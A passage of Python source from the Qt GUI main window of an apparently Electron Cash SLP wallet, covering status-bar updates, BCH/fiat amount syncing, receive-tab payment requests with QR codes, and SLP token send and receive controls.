text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
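# Wire a BCH amount edit and its fiat counterpart together: editing either field
# recomputes the other from the current exchange rate (when the FX module is
# enabled) and colours the derived field blue; the `follows` flag stops the two
# textChanged handlers from re-triggering each other.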
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
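# Refresh the status bar: connection icon, balance text (BCH, optional SLP token
# balance and fiat), lag/fork indication and the seed-backup button. Icons and
# tooltip strings are cached in class-level dicts since this runs on every
# network/wallet update.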
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
"seed_ok" : QIcon(":icons/seed.png"),
"seed_warning" : QIcon(":icons/seed_warning.png")
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
text = ""
if not self.is_slp_wallet:
text += "Tokens Disabled - "
else:
token_id = self.slp_token_id
try:
d = self.wallet.token_types[token_id]
except (AttributeError, KeyError):
pass
else:
bal = format_satoshis_nofloat(self.wallet.get_slp_token_balance(token_id, { 'user_config': { 'confirmed_only': False } })[0],
decimal_point=d['decimals'],)
text += "%s Token Balance: %s; "%(d['name'], bal)
c, u, x = self.wallet.get_balance()
text += _("BCH Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
# Provide extra warning and instructions to user if he/she has tokens in a non-SLP wallet type.
if not self.is_slp_wallet:
locked_in_slp = self.wallet.get_slp_locked_balance()
if locked_in_slp > 0:
self._warn_slp_prefers_slp_wallets_if_not_slp_wallet()
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
addr_format = self.config.get('addr_format', 1)
self.setAddrFormatText(addr_format)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
if self.wallet.has_seed():
if self.wallet.storage.get('wallet_seed_needs_backup'):
self.seed_button.setIcon(icon_dict["seed_warning"])
self.seed_button.setToolTip(_("Seed Requires Backup!"))
self.seed_button.setStatusTip(self.seed_button.toolTip())
else:
self.seed_button.setIcon(icon_dict["seed_ok"])
self.seed_button.setToolTip(_("Seed"))
self.seed_button.setStatusTip(None)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def create_slp_history_tab(self):
from .slp_history_list import HistoryList
self.slp_history_list = l = HistoryList(self)
return self.create_list_tab(l)
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def addr_toggle_slp(self, force_slp=False):
def present_slp():
self.toggle_cashaddr(2, True)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
if force_slp:
present_slp()
return
if Address.FMT_UI == Address.FMT_SLPADDR:
self.toggle_cashaddr(1, True)
self.receive_token_type_combo.setCurrentIndex(0)
else:
present_slp()
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
if self.is_slp_wallet:
self.show_slp_addr_btn = QPushButton(_('Show Token Address'))
self.show_slp_addr_btn.clicked.connect(self.addr_toggle_slp)
grid.addWidget(self.show_slp_addr_btn, 1, 1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
msg = _('Select the SLP token to Request.')
self.receive_token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.receive_token_type_combo.setItemDelegate(QStyledItemDelegate(self.receive_token_type_combo))
self.receive_token_type_combo.setFixedWidth(200)
self.receive_token_type_combo.currentIndexChanged.connect(self.on_slptok_receive)
#self.receive_token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.receive_slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.receive_slp_token_type_label, 4, 0)
grid.addWidget(self.receive_token_type_combo, 4, 1)
self.receive_slp_amount_e = SLPAmountEdit('tokens', 0)
self.receive_slp_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_slp_amount_label = QLabel(_('Req. token amount'))
grid.addWidget(self.receive_slp_amount_label, 5, 0)
grid.addWidget(self.receive_slp_amount_e, 5, 1)
self.receive_slp_amount_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
self.receive_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_amount_label = QLabel(_('Requested &amount'))
self.receive_amount_label.setBuddy(self.receive_amount_e)
grid.addWidget(self.receive_amount_label, 6, 0)
grid.addWidget(self.receive_amount_e, 6, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
if Address.FMT_UI != Address.FMT_SLPADDR:
self.receive_token_type_combo.setDisabled(True)
self.receive_slp_token_type_label.setDisabled(True)
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
else:
self.receive_token_type_combo.setDisabled(False)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 6, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 7, 0)
grid.addWidget(self.expires_combo, 7, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 7, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 8, 1, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
if self.main_window.is_slp_wallet:
c, u, x = self.main_window.wallet.get_balance()
bal = c + u - self.main_window.wallet.get_slp_locked_balance()
if bal < 1000:
# if not self.low_balance_warning_shown:
# self.main_window.show_warning("Low BCH balance.\n\nCreating and sending SLP tokens requires Bitcoin Cash to cover transaction fees. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.main_window.toggle_cashaddr(1, True)
self.low_balance_warning_shown = False
else:
self.main_window.toggle_cashaddr(2, True)
if Address.FMT_UI == Address.FMT_SLPADDR:
self.main_window.show_slp_addr_btn.setText("Show BCH Address")
else:
self.main_window.show_slp_addr_btn.setText("Show Token Address")
else:
self.main_window.toggle_cashaddr(1, True)
w = ReceiveTab()
w.low_balance_warning_shown = False
w.main_window = self
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
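# Builds the payment URI for a saved receive request, appending the creation time,
# expiry and, when the request was signed, the requestor name and signature.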
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw, token_id=req.get('token_id'))
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
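# Saves a payment request for the current receive address, using the SLP token
# amount when a token type is selected and the BCH amount otherwise, then
# attempts to sign it and refreshes the request and address lists.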
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
return
if self.receive_token_type_combo.currentData() is not None:
amount = float(self.receive_slp_amount_e.text())
else:
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
if self.receive_token_type_combo.currentData() is not None:
tokenid = self.receive_token_type_combo.currentData()
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, token_id=tokenid, **kwargs)
else:
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
self.receive_token_type_combo.setCurrentIndex(0)
self.receive_slp_amount_e.setText("")
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# create a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
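# Regenerates the receive-request URI and QR code from the current form contents
# and updates the detached QR window, if it is open.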
def update_receive_qr(self):
if self.receive_token_type_combo.currentData() is not None and self.receive_slp_amount_e.text() != '':
amount = self.receive_slp_amount_e.text() # if self.receive_slp_amount_e.text() is not '' else None
token_id = self.receive_token_type_combo.currentData()
else:
amount = self.receive_amount_e.get_amount()
token_id = None
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
elif not token_id:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
else:
uri = web.create_URI(self.receive_address, amount, message, **kwargs, token_id=token_id)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
if self.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.show_slp_addr_btn.setText("Show BCH Address")
else:
self.show_slp_addr_btn.setText("Show Token Address")
def on_slptok(self):
self.slp_token_id = self.token_type_combo.currentData()
self.payto_e.check_text()
self.slp_amount_e.setText("")
if self.slp_token_id is None:
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
self.slp_extra_bch_cb.setHidden(True)
self.slp_amount_e.setDisabled(True)
self.slp_max_button.setDisabled(True)
self.slp_amount_label.setDisabled(True)
self.message_opreturn_e.setEnabled(True)
self.opreturn_rawhex_cb.setEnabled(True)
self.opreturn_label.setEnabled(True)
else:
self.slp_extra_bch_cb.setHidden(False)
self.slp_extra_bch_cb.setChecked(False)
self.slp_extra_bch_cb.clicked.emit()
self.slp_amount_e.setDisabled(False)
self.slp_max_button.setDisabled(False)
self.slp_amount_label.setDisabled(False)
tok = self.wallet.token_types[self.slp_token_id]
self.slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
self.message_opreturn_e.setEnabled(False)
self.message_opreturn_e.setText('')
self.opreturn_rawhex_cb.setEnabled(False)
self.opreturn_label.setEnabled(False)
self.update_status()
self.do_update_fee()
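# Receive-tab counterpart of on_slptok: switches the request form between BCH
# and SLP token amount entry based on the selected token type.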
def on_slptok_receive(self):
self.receive_slp_amount_e.setText("")
self.receive_amount_e.setText("")
slp_token_id = self.receive_token_type_combo.currentData()
self.update_receive_qr()
if slp_token_id is None:
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
self.receive_amount_e.setDisabled(False)
self.receive_amount_label.setDisabled(False)
self.fiat_receive_e.setDisabled(False)
else:
self.addr_toggle_slp(True)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.receive_amount_e.setDisabled(True)
self.receive_amount_label.setDisabled(True)
self.fiat_receive_e.setDisabled(True)
tok = self.wallet.token_types[slp_token_id]
self.receive_slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
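# Enables the BCH amount fields when "Also send BCH?" is checked alongside an
# SLP send, and clears and disables them when it is unchecked.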
def on_slp_extra_bch(self):
if self.slp_extra_bch_cb.isChecked():
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
else:
self.amount_e.setText('')
self.max_button.setChecked(False)
self.amount_e.setDisabled(True)
self.amount_label.setDisabled(True)
self.max_button.setDisabled(True)
self.fiat_send_e.setDisabled(True)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.parent = self
self.slp_send_tab_widgets = []
if self.is_slp_wallet:
self.slp_amount_e = SLPAmountEdit('tokens', 0)
self.token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.token_type_combo.setItemDelegate(QStyledItemDelegate(self.token_type_combo))
self.token_type_combo.setFixedWidth(200)
self.token_type_combo.currentIndexChanged.connect(self.on_slptok)
self.token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.slp_send_tab_widgets += [
self.slp_amount_e, self.token_type_combo
]
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> Simple Ledger <b>Address</b>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
"<li> <b>CoinText</b> e.g. <i>cointext:+1234567</i>"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
